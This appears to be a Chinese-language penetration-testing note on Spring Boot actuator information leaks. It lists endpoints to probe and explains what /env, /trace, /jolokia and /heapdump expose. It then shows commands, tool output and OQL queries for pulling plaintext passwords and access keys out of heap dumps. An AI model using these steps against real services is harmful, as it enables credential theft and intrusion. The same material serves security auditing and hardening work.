springboot信息泄露
可能泄漏的路由
/api-docs /v2/api-docs /swagger-ui.html /api.html /sw/swagger-ui.html /api/swagger-ui.html /template/swagger-ui.html /spring-security-rest/api/swagger-ui.html /spring-security-oauth-resource/swagger-ui.html /mappings /actuator/mappings /metrics /actuator/metrics /beans /actuator/beans /configprops /actuator/configprops /actuator /auditevents /autoconfig /caches /conditions /docs /dump /env /flyway /health /heapdump /httptrace /info /intergrationgraph /jolokia /logfile /loggers /liquibase /prometheus /refresh /scheduledtasks /sessions /shutdown /trace /threaddump /actuator/auditevents /actuator/health /actuator/conditions /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/scheduledtasks /actuator/httptrace /actuator/jolokia /actuator/hystrix.stream
/trace:显示最近的http包信息,可能泄露当前系统存活的Cookie信息。
/env:应用的环境信息,包含Profile、系统环境变量和应用的properties信息,可能泄露明文密码与接口信息。
/jolokia:RCE漏洞
/heapdump:JVM内存信息,分析出明文密码
heapdump
堆转储文件,是一个java进程在某个时间点上的内存快照
可以使用 JVisualVM:JDK自带工具,供开发者用于监视,故障排除。
实际环境
springboot信息泄漏测试
1.访问/actuator/目录查看是否存在泄漏文件
主要是版本的问题 springboot 2.x就有/actuator开头 1.x就没有
2.利用目录爆破探测出存在/heapdump目录
heapdump分析
工具一:heapdump_tool
heapdump敏感信息查询工具,找到spring heapdump中的密码明文,AK,SK等
https://github.com/wyzxxz/heapdump_tool
https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20220720/heapdump_tool.jar
工具使用
java -jar heapdump_tool.jar heapdump.6(file)
root@wy:~# > java -jar heapdump_tool.jar heapdump.6 [-] file: heapdump.6 [-] Start jhat, waiting... [-] get objects,waiting(1-2min)... [-] fing object count: 113128 [-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit. > spring.datasource.password [-] Start find keyword: spring.datasource.password >> spring.datasource.password -> test@wyzxxz [-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit. > accesskey [-] Start find keyword: accessKey >> ConnectionProperties.noAccessToProcedureBodies -> When determining procedure parameter types for CallableStatements, and the connected user can''t access procedure bodies through "SHOW CREATE PROCEDURE" or select on mysql.proc should the driver instead create basic metadata >> accessKey -> LTA************** [-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit. > q [-] exit.
查询密码 > password
获取ip > getip
获取url > geturl
获取文件路径 > getfile
工具使用二 : eclipse memoryanalyzer
http://www.eclipse.org/mat/downloads.php
heapdump分析
spring boot 1.x 版本 heapdump 查询结果,最终结果存储在 java.util.Hashtable$Entry 实例的键值对中
select * from org.springframework.web.context.support.StandardServletEnvironment select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
spring boot 2.x 版本 heapdump 查询结果,最终结果存储在 java.util.LinkedHashMap$Entry 实例的键值对中:
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
